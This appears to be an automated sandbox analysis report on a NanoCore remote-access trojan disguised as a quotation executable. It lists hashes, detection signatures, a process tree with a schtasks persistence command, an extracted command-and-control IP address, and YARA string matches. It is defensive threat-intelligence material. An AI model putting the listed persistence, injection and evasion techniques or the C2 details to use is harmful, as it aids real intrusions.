Play interactive tour

Edit tour

Analysis Report Quotation ATB-PR28500KINH.exe

Overview

General Information

Sample Name:	Quotation ATB-PR28500KINH.exe
Analysis ID:	321029
MD5:	ddb5d5410477cd3855a1f542112808c0
SHA1:	5fc06ec885cafa6e8f955651b9e2115b705b2b4d
SHA256:	9f76f4b990ce938d48b11501ad00d99795b172b44b1f94ea7ca3a26ceb64c1d5
Tags:	exeNanoCorenVpnRAT
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Drops PE files to the startup folder

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Tries to load missing DLLs

Yara signature match

Classification

Startup

System is w10x64

Quotation ATB-PR28500KINH.exe (PID: 7036 cmdline: 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe' MD5: DDB5D5410477CD3855A1F542112808C0)

RegAsm.exe (PID: 3392 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

schtasks.exe (PID: 5816 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Quotation ATB-PR28500KINH.exe (PID: 6248 cmdline: 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe' MD5: DDB5D5410477CD3855A1F542112808C0)

RegAsm.exe (PID: 7160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["185.140.53.139"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6b457:$a: NanoCore 0x6b4b0:$a: NanoCore 0x6b4ed:$a: NanoCore 0x6b566:$a: NanoCore 0x6b4b9:$b: ClientPlugin 0x6b4f6:$b: ClientPlugin 0x6bdf4:$b: ClientPlugin 0x6be01:$b: ClientPlugin 0x615c2:$e: KeepAlive 0x6b941:$g: LogClientMessage 0x6b8c1:$i: get_Connected 0x5b88d:$j: #=q 0x5b8bd:$j: #=q 0x5b8f9:$j: #=q 0x5b921:$j: #=q 0x5b951:$j: #=q 0x5b981:$j: #=q 0x5b9b1:$j: #=q 0x5b9e1:$j: #=q 0x5b9fd:$j: #=q 0x5ba2d:$j: #=q
00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x359d:$a: NanoCore 0x35f6:$a: NanoCore 0x3633:$a: NanoCore 0x36ac:$a: NanoCore 0x16d57:$a: NanoCore 0x16d6c:$a: NanoCore 0x16da1:$a: NanoCore 0x2fd33:$a: NanoCore 0x2fd48:$a: NanoCore 0x2fd7d:$a: NanoCore 0x35ff:$b: ClientPlugin 0x363c:$b: ClientPlugin 0x3f3a:$b: ClientPlugin 0x3f47:$b: ClientPlugin 0x16b13:$b: ClientPlugin 0x16b2e:$b: ClientPlugin 0x16b5e:$b: ClientPlugin 0x16d75:$b: ClientPlugin 0x16daa:$b: ClientPlugin 0x2faef:$b: ClientPlugin 0x2fb0a:$b: ClientPlugin
00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4b17d:$x1: NanoCore.ClientPluginHost 0x4b1ba:$x2: IClientNetworkHost 0x4eced:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4aee5:$a: NanoCore 0x4aef5:$a: NanoCore 0x4b129:$a: NanoCore 0x4b13d:$a: NanoCore 0x4b17d:$a: NanoCore 0x4af44:$b: ClientPlugin 0x4b146:$b: ClientPlugin 0x4b186:$b: ClientPlugin 0x4b06b:$c: ProjectData 0x4ba72:$d: DESCrypto 0x5343e:$e: KeepAlive 0x5142c:$g: LogClientMessage 0x4d627:$i: get_Connected 0x4bda8:$j: #=q 0x4bdd8:$j: #=q 0x4bdf4:$j: #=q 0x4be24:$j: #=q 0x4be40:$j: #=q 0x4be5c:$j: #=q 0x4be8c:$j: #=q 0x4bea8:$j: #=q
00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4e02d:$x1: NanoCore.ClientPluginHost 0x4e06a:$x2: IClientNetworkHost 0x51b9d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4dd95:$a: NanoCore 0x4dda5:$a: NanoCore 0x4dfd9:$a: NanoCore 0x4dfed:$a: NanoCore 0x4e02d:$a: NanoCore 0x4ddf4:$b: ClientPlugin 0x4dff6:$b: ClientPlugin 0x4e036:$b: ClientPlugin 0x4df1b:$c: ProjectData 0x4e922:$d: DESCrypto 0x562ee:$e: KeepAlive 0x542dc:$g: LogClientMessage 0x504d7:$i: get_Connected 0x4ec58:$j: #=q 0x4ec88:$j: #=q 0x4eca4:$j: #=q 0x4ecd4:$j: #=q 0x4ecf0:$j: #=q 0x4ed0c:$j: #=q 0x4ed3c:$j: #=q 0x4ed58:$j: #=q
00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x146bd:$x1: NanoCore.ClientPluginHost 0x146fa:$x2: IClientNetworkHost 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x14425:$a: NanoCore 0x14435:$a: NanoCore 0x14669:$a: NanoCore 0x1467d:$a: NanoCore 0x146bd:$a: NanoCore 0x14484:$b: ClientPlugin 0x14686:$b: ClientPlugin 0x146c6:$b: ClientPlugin 0x145ab:$c: ProjectData 0x14fb2:$d: DESCrypto 0x1c97e:$e: KeepAlive 0x1a96c:$g: LogClientMessage 0x16b67:$i: get_Connected 0x152e8:$j: #=q 0x15318:$j: #=q 0x15334:$j: #=q 0x15364:$j: #=q 0x15380:$j: #=q 0x1539c:$j: #=q 0x153cc:$j: #=q 0x153e8:$j: #=q
0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4359d:$a: NanoCore 0x435f6:$a: NanoCore 0x43633:$a: NanoCore 0x436ac:$a: NanoCore 0x56d57:$a: NanoCore 0x56d6c:$a: NanoCore 0x56da1:$a: NanoCore 0x6fd33:$a: NanoCore 0x6fd48:$a: NanoCore 0x6fd7d:$a: NanoCore 0x435ff:$b: ClientPlugin 0x4363c:$b: ClientPlugin 0x43f3a:$b: ClientPlugin 0x43f47:$b: ClientPlugin 0x56b13:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56b5e:$b: ClientPlugin 0x56d75:$b: ClientPlugin 0x56daa:$b: ClientPlugin 0x6faef:$b: ClientPlugin 0x6fb0a:$b: ClientPlugin
00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x146bd:$x1: NanoCore.ClientPluginHost 0x146fa:$x2: IClientNetworkHost 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x14425:$a: NanoCore 0x14435:$a: NanoCore 0x14669:$a: NanoCore 0x1467d:$a: NanoCore 0x146bd:$a: NanoCore 0x14484:$b: ClientPlugin 0x14686:$b: ClientPlugin 0x146c6:$b: ClientPlugin 0x145ab:$c: ProjectData 0x14fb2:$d: DESCrypto 0x1c97e:$e: KeepAlive 0x1a96c:$g: LogClientMessage 0x16b67:$i: get_Connected 0x152e8:$j: #=q 0x15318:$j: #=q 0x15334:$j: #=q 0x15364:$j: #=q 0x15380:$j: #=q 0x1539c:$j: #=q 0x153cc:$j: #=q 0x153e8:$j: #=q
Process Memory Space: RegAsm.exe PID: 7160	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2bd94:$x1: NanoCore.ClientPluginHost 0x3a4fc:$x1: NanoCore.ClientPluginHost 0x59c90:$x1: NanoCore.ClientPluginHost 0x5f84f:$x1: NanoCore.ClientPluginHost 0x70bdf:$x1: NanoCore.ClientPluginHost 0x2bdba:$x2: IClientNetworkHost 0x3a55d:$x2: IClientNetworkHost 0x59cb6:$x2: IClientNetworkHost 0x5f894:$x2: IClientNetworkHost 0x70c24:$x2: IClientNetworkHost 0x3f962:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4d8d4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 7160	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7160	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3c28:$a: NanoCore 0x3c90:$a: NanoCore 0x3d46:$a: NanoCore 0x2bc86:$a: NanoCore 0x2bd27:$a: NanoCore 0x2bd94:$a: NanoCore 0x2be55:$a: NanoCore 0x2cd26:$a: NanoCore 0x2cd79:$a: NanoCore 0x2cdb2:$a: NanoCore 0x2ce25:$a: NanoCore 0x2e7ce:$a: NanoCore 0x2e8c5:$a: NanoCore 0x2e8e1:$a: NanoCore 0x2e8fd:$a: NanoCore 0x2e919:$a: NanoCore 0x3a001:$a: NanoCore 0x3a01d:$a: NanoCore 0x3a178:$a: NanoCore 0x3a187:$a: NanoCore 0x3a460:$a: NanoCore
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x131f28:$x1: NanoCore.ClientPluginHost 0x22f0b9:$x1: NanoCore.ClientPluginHost 0x131f89:$x2: IClientNetworkHost 0x22f11a:$x2: IClientNetworkHost 0x13738e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x145300:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x23451f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x242491:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x131a2d:$a: NanoCore 0x131a49:$a: NanoCore 0x131ba4:$a: NanoCore 0x131bb3:$a: NanoCore 0x131e8c:$a: NanoCore 0x131eb8:$a: NanoCore 0x131f28:$a: NanoCore 0x14196a:$a: NanoCore 0x14197c:$a: NanoCore 0x1419b8:$a: NanoCore 0x22ebbe:$a: NanoCore 0x22ebda:$a: NanoCore 0x22ed35:$a: NanoCore 0x22ed44:$a: NanoCore 0x22f01d:$a: NanoCore 0x22f049:$a: NanoCore 0x22f0b9:$a: NanoCore 0x23eafb:$a: NanoCore 0x23eb0d:$a: NanoCore 0x23eb49:$a: NanoCore 0x131ad4:$b: ClientPlugin
Process Memory Space: RegAsm.exe PID: 3392	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc7016:$x1: NanoCore.ClientPluginHost 0x183626:$x1: NanoCore.ClientPluginHost 0x1891e5:$x1: NanoCore.ClientPluginHost 0x19a576:$x1: NanoCore.ClientPluginHost 0x273bc4:$x1: NanoCore.ClientPluginHost 0x282af5:$x1: NanoCore.ClientPluginHost 0xc703c:$x2: IClientNetworkHost 0x18364c:$x2: IClientNetworkHost 0x18922a:$x2: IClientNetworkHost 0x19a5bb:$x2: IClientNetworkHost 0x273c09:$x2: IClientNetworkHost 0x282b56:$x2: IClientNetworkHost 0x287f5b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x295ecd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 3392	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 3392	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x20e9:$a: NanoCore 0x64c6e:$a: NanoCore 0x64cd6:$a: NanoCore 0x64dc3:$a: NanoCore 0xc25f9:$a: NanoCore 0xc2619:$a: NanoCore 0xc6f08:$a: NanoCore 0xc6fa9:$a: NanoCore 0xc7016:$a: NanoCore 0xc70d7:$a: NanoCore 0xc7fa8:$a: NanoCore 0xc7ffb:$a: NanoCore 0xc8034:$a: NanoCore 0xc80a7:$a: NanoCore 0x183518:$a: NanoCore 0x1835b9:$a: NanoCore 0x183626:$a: NanoCore 0x1836e7:$a: NanoCore 0x1845b8:$a: NanoCore 0x18460b:$a: NanoCore 0x184644:$a: NanoCore
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc9eb8:$x1: NanoCore.ClientPluginHost 0x14512a:$x1: NanoCore.ClientPluginHost 0x1724e7:$x1: NanoCore.ClientPluginHost 0xc9f19:$x2: IClientNetworkHost 0x14518b:$x2: IClientNetworkHost 0x172548:$x2: IClientNetworkHost 0xcf31e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xdd290:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x14a590:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x158502:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x17794d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1858bf:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xc99bd:$a: NanoCore 0xc99d9:$a: NanoCore 0xc9b34:$a: NanoCore 0xc9b43:$a: NanoCore 0xc9e1c:$a: NanoCore 0xc9e48:$a: NanoCore 0xc9eb8:$a: NanoCore 0xd98fa:$a: NanoCore 0xd990c:$a: NanoCore 0xd9948:$a: NanoCore 0x144c2f:$a: NanoCore 0x144c4b:$a: NanoCore 0x144da6:$a: NanoCore 0x144db5:$a: NanoCore 0x14508e:$a: NanoCore 0x1450ba:$a: NanoCore 0x14512a:$a: NanoCore 0x154b6c:$a: NanoCore 0x154b7e:$a: NanoCore 0x154bba:$a: NanoCore 0x171fec:$a: NanoCore
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.RegAsm.exe.6670000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
1.2.RegAsm.exe.6670000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
1.2.RegAsm.exe.6670000.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.RegAsm.exe.5aa0000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
1.2.RegAsm.exe.5aa0000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
1.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
